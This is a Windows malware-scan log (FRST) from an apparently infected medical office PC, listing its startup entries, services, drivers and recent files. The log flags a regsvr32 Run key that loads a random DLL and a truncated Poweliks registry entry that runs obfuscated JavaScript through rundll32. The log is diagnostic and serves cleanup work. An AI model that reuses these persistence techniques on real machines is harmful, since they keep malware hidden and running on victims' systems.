HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254696 2011-04-08] (Sun Microsystems, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [39136 2012-12-18] (Adobe Systems Incorporated)
HKLM\...\Run: [Acrobat Assistant 8.0] => C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [825560 2012-12-18] (Adobe Systems Inc.)
HKLM\...\Run: [XeroxEndeavorBackgroundTask] => rundll32.exe xrWCbgnd.dll,LaunchBgTask 1
HKLM\...\Run: [ZocDoc Alerter] => C:\Program Files\ZocDoc\ZocDoc Alerter\launcher.bat [61 2013-11-06] ()
HKLM\...\Run: [DBAgent] => C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1519176 2014-02-10] (Seagate Technology LLC)
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\Run: [Uploader] => C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [126056 2014-02-10] (Seagate Technology LLC)
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\Run: [dmzsfmczo] => regsvr32.exe /s "C:\Users\Server\AppData\Local\{29E5C0CD-57B9-4F77-9AC8-3D2490B42522}\dmzsfmczo.dll" <===== ATTENTION
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\MountPoints2: E - E:\LaunchU3.exe -a
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\MountPoints2: {a73fbc25-2458-11e3-a7ed-842b2b8dc106} - E:\LaunchU3.exe -a
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SmartPrintAPC.lnk
ShortcutTarget: SmartPrintAPC.lnk -> C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe (Jones Medical)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?ocid=msndhp
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USSMB/1
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {070566A4-5FDE-4262-8CC7-07BA1BD08A8D} URL = http://websearch.shopathome.com?user_id=%guid&q={searchTerms}
SearchScopes: HKCU - {1587C1CC-A7C1-4BCE-A8B8-7AA39DD4B7D7} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files\Norton Internet Security\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files\Norton Internet Security\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files\Norton Internet Security\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{0F9DC998-7064-4B0B-BDF8-404185767936}: [NameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default
FF Homepage: about:home
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF user.js: detected! => C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\user.js
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\searchplugins\my-web-search.xml
FF SearchPlugin: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\searchplugins\safesearch.xml
FF Extension: TelevisionFanatic - C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\Extensions\64ffxtbr@TelevisionFanatic.com [2014-02-10]
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\Extensions\LogMeInClient@logmein.com [2011-02-08]
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2011-02-01]
FF HKLM\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension [2011-12-29]
FF HKLM\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn [2014-11-04]
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files\Norton Internet Security\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-02]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CenLPD; C:\Program Files\Century\TinyTERM\CenLPD.exe [107976 2009-03-18] ()
R2 iTivityRCConnector; C:\Program Files\iTivity\bin\connector_rc.exe [511771 2010-09-09] (Tridia Corporation) [File not signed]
R2 iTivityRCConnectToIASConnector; C:\Program Files\iTivity\bin\connector_rc.exe [511771 2010-09-09] (Tridia Corporation) [File not signed]
R2 iTivityRCController; C:\Program Files\iTivity\bin\processor_rc.exe [552159 2010-09-09] (Tridia Corporation) [File not signed]
S3 LiveUpdate; C:\Program Files\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093944 2011-01-19] (Symantec Corporation)
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 MMWin AppServer; C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe [110592 2010-11-08] () [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [45568 2014-04-28] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe [276376 2014-09-21] (Symantec Corporation)
R2 pg-plus-8.3; C:\PostgresPlus\8.3\bin\pg_ctl.exe [65536 2009-12-10] (PostgreSQL Global Development Group) [File not signed]
S3 pg-plus-8.3-replication; C:\PostgresPlus\8.3\bin\slon.exe [2071599 2009-03-13] (PostgreSQL Global Development Group) [File not signed]
S3 pg-plus-8.3-scheduler; C:\PostgresPlus\8.3\bin\pgAgent.exe [704512 2009-03-13] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [55808 2014-04-28] (Hewlett-Packard) [File not signed]
S2 rb_meddata_34083; C:\Med\Medprogs\rbroker.exe [645632 2010-11-16] () [File not signed]
R2 Remote Monitoring; C:\Program Files\rmss\WIN_MONITOR.exe [94337 2012-11-20] () [File not signed]
R2 Seagate Dashboard Services; C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16000 2014-02-10] (Seagate Technology LLC)
R2 Seagate MobileBackup Service; C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe [157264 2014-02-10] (Seagate Technology LLC)
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 TridiaFTPServer; C:\Program Files\iTivity\bin\ftpd.exe [536640 2007-07-16] (Tridia Corporation) [File not signed]
R2 tridiavnc; C:\Program Files\iTivity\bin\rfbd.exe [473600 2010-07-28] (Tridia Corporation) [File not signed]
R2 ultia; C:\MED\JDF\service\Wrapper.exe [106496 2010-10-25] () [File not signed]
S2 um_meddata_34083; C:\Python25\lib\site-packages\win32\PythonService.exe [8704 2009-07-05] () [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx86; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20141030.001\BHDrvx86.sys [1138392 2014-10-03] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NIS\1506000.020\ccSetx86.sys [127064 2013-09-25] (Symantec Corporation)
R2 CenNFS; C:\Windows\System32\drivers\CenNFS.sys [138528 2000-06-16] () [File not signed]
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-09-09] (Symantec Corporation)
R3 FTDIBUS; C:\Windows\System32\drivers\ftdibus.sys [61704 2011-03-18] (FTDI Ltd.)
R1 IDSVix86; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20141103.001\IDSvix86.sys [476888 2014-08-28] (Symantec Corporation)
R3 mf; C:\Windows\System32\DRIVERS\mf.sys [114176 2009-07-13] (Microsoft Corporation)
R3 NAVENG; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20141103.034\NAVENG.SYS [95704 2014-10-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20141103.034\NAVEX15.SYS [1636696 2014-10-21] (Symantec Corporation)
R3 NmPar; C:\Windows\System32\DRIVERS\NmPar.sys [81920 2010-01-12] (Windows ® Codename Longhorn DDK provider)
R1 SRTSP; C:\Windows\System32\Drivers\NIS\1506000.020\SRTSP.SYS [664792 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NIS\1506000.020\SRTSPX.SYS [32984 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NIS\1506000.020\SYMDS.SYS [367704 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NIS\1506000.020\SYMEFA.SYS [936152 2014-03-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [142936 2013-11-18] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NIS\1506000.020\Ironx86.SYS [209624 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NIS\1506000.020\SYMNETS.SYS [447704 2014-02-17] (Symantec Corporation)
S3 usbbus; C:\Windows\System32\DRIVERS\lgusbbus.sys [13056 2008-11-11] (LG Electronics Inc.)
S3 UsbDiag; C:\Windows\System32\DRIVERS\lgusbdiag.sys [19968 2008-11-11] (LG Electronics Inc.)
S3 UsbGps; C:\Windows\System32\DRIVERS\lgusbgps.sys [19968 2008-11-11] (LG Electronics Inc.)
S3 USBModem; C:\Windows\System32\DRIVERS\lgusbmodem.sys [24832 2008-11-11] (LG Electronics Inc.)
S4 LMIRfsClientNP; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-04 13:44 - 2014-11-04 13:46 - 00019761 _____ () C:\Users\Server\Desktop\FRST.txt
2014-11-04 13:39 - 2014-11-04 13:44 - 00000000 ____D () C:\FRST
2014-11-04 13:38 - 2014-11-04 13:37 - 01106432 _____ (Farbar) C:\Users\Server\Desktop\FRST.exe
2014-11-04 13:30 - 2014-11-04 13:28 - 02114560 _____ (Farbar) C:\Users\Server\Desktop\FRST64.exe
2014-10-31 15:28 - 2014-10-31 15:28 - 00000000 ____D () C:\Users\Server\AppData\Local\Seagate_Technology_LLC
2014-10-31 13:23 - 2014-10-31 13:05 - 31679168 _____ (Microsoft Corporation) C:\Users\Server\Desktop\Windows-KB890830-V5.17.exe
2014-10-31 11:53 - 2014-10-31 11:53 - 00000028 _____ () C:\Windows\system32\u
2014-10-31 10:19 - 2014-10-31 10:19 - 00000112 ___RH () C:\Users\Server\Desktop\Stinger.opt
2014-10-31 09:35 - 2014-10-31 10:19 - 00000000 ____D () C:\Program Files\stinger
2014-10-31 09:01 - 2014-10-31 09:01 - 00000000 _____ () C:\Windows\system32\cnsvbuk.dll
2014-10-31 09:00 - 2014-10-31 09:00 - 00040960 _____ () C:\Windows\system32\jvnnbbh.dll
2014-10-31 08:59 - 2014-10-31 08:59 - 00031232 _____ () C:\Windows\system32\jxesd.dll
2014-10-30 12:19 - 2014-10-30 12:19 - 00000000 ____D () C:\Users\Server\AppData\Roaming\Roxio Log Files
2014-10-27 11:27 - 2014-10-27 12:41 - 00007598 _____ () C:\Users\Server\AppData\Local\resmon.resmoncfg
2014-10-16 01:31 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 01:31 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 01:31 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 01:31 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 01:31 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 01:31 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 01:31 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 01:31 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 01:31 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 01:31 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 01:31 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 01:31 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 01:31 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 01:31 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-16 01:31 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-16 01:31 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 01:31 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-16 01:31 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-16 01:31 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 01:31 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 01:31 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 01:31 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 01:31 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-16 01:31 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-16 01:31 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-16 01:31 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-16 01:31 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 01:31 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 01:31 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 01:31 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 01:31 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-16 01:31 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 01:31 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 01:31 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 01:31 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 01:30 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 01:30 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 01:30 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-16 01:30 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 01:30 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 01:30 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 01:30 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-16 01:30 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 01:30 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 01:30 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-07 11:00 - 2014-10-07 11:00 - 00000000 _____ () C:\Windows\HPMProp.INI
2014-10-07 10:58 - 2014-06-17 02:57 - 00055688 _____ (Hewlett-Packard) C:\Windows\system32\hpmnque.dll
2014-10-07 10:58 - 2014-06-17 02:57 - 00055688 _____ (Hewlett-Packard) C:\Windows\system32\hpmnndps.dll
2014-10-07 10:58 - 2014-06-17 02:55 - 00103200 _____ (Hewlett-Packard Company) C:\Windows\system32\hpmlm135.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00196896 _____ (Hewlett-Packard) C:\Windows\system32\hpmml170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00171296 _____ (Hewlett-Packard) C:\Windows\system32\hpmja170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00157984 _____ (Hewlett-Packard) C:\Windows\system32\hpmpm081.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00134944 _____ (Hewlett-Packard) C:\Windows\system32\hpmtp170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00062752 _____ (Hewlett-Packard) C:\Windows\system32\hpmpw081.dll
2014-10-07 10:58 - 2014-06-17 02:51 - 00421664 _____ (Hewlett-Packard Corporation) C:\Windows\system32\hpcpn170.dll
2014-10-07 10:58 - 2014-06-17 02:51 - 00119584 _____ (Hewlett-Packard) C:\Windows\system32\hpcjpm.dll
2014-10-07 10:58 - 2011-02-11 14:23 - 00167480 _____ (Hewlett-Packard) C:\Windows\system32\hppccompio.dll
2014-10-07 10:58 - 2009-02-25 16:32 - 00059928 _____ (Hewlett-Packard) C:\Windows\system32\fxcompchannel.dll
2014-10-07 10:50 - 2014-10-07 10:50 - 16652576 _____ () C:\Users\Server\Downloads\upd-pcl5-x32-5.9.0.18326.exe
2014-10-07 10:41 - 2014-10-07 10:52 - 00000000 ____D () C:\HP Universal Print Driver
2014-10-07 10:26 - 2014-10-31 13:04 - 00000000 ____D () C:\Program Files\Mozilla Firefox
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-04 13:45 - 2011-03-28 11:31 - 00000000 ____D () C:\Program Files\rmss
2014-11-04 13:40 - 2009-07-13 23:34 - 00025424 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 13:40 - 2009-07-13 23:34 - 00025424 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 13:32 - 2010-12-17 20:36 - 00801194 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 13:25 - 2013-01-08 09:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 12:54 - 2009-07-13 23:55 - 02066563 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 12:34 - 2013-07-30 14:01 - 00000000 ____D () C:\Users\Server\AppData\Local\CrashDumps
2014-11-04 12:23 - 2011-03-28 09:48 - 00011300 ___SH () C:\Windows\system32\.admconf
2014-11-04 12:23 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 12:22 - 2009-07-13 23:39 - 00046096 _____ () C:\Windows\setupact.log
2014-10-31 11:39 - 2012-07-26 13:52 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-31 09:59 - 2010-12-17 22:27 - 00249332 _____ () C:\Windows\PFRO.log
2014-10-30 15:23 - 2011-04-26 09:44 - 00000000 ____D () C:\Program Files\HP
2014-10-30 15:22 - 2011-04-26 09:44 - 00000000 ____D () C:\ProgramData\HP
2014-10-30 15:20 - 2011-04-26 09:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2014-10-30 14:11 - 2009-07-13 23:52 - 00000000 ____D () C:\Windows\twain_32
2014-10-30 12:38 - 2011-02-03 18:15 - 00000252 _____ () C:\Windows\wininit.ini
2014-10-30 12:26 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\Roxio Shared
2014-10-30 12:25 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\PX Storage Engine
2014-10-30 12:20 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\InstallShield
2014-10-30 12:12 - 2011-03-09 11:42 - 00000000 ____D () C:\Users\Dr. Shapiro
2014-10-30 12:10 - 2013-11-14 09:20 - 00000000 ____D () C:\Users\Dr. Shapiro\AppData\Local\ZocDocAlerter
2014-10-29 15:30 - 2013-04-19 11:40 - 00000000 ____D () C:\Users\Server\Documents\DEMOS-Eat & Beat
2014-10-29 13:29 - 2011-02-03 15:28 - 00000000 ____D () C:\Users\Server\Documents\LABELS
2014-10-29 10:02 - 2013-09-04 11:01 - 00000000 ____D () C:\Users\Server\Documents\APS's
2014-10-27 14:54 - 2012-07-26 13:53 - 00000000 ____D () C:\Program Files\Google
2014-10-27 14:50 - 2012-07-26 13:53 - 00000000 ____D () C:\Users\Server\AppData\Local\Google
2014-10-22 15:28 - 2012-08-17 11:32 - 00000000 ____D () C:\Users\Server\AppData\Local\{29E5C0CD-57B9-4F77-9AC8-3D2490B42522}
2014-10-20 14:52 - 2013-09-04 09:47 - 00000000 ____D () C:\Users\Server\Documents\LETTERS FOR PATIENTS
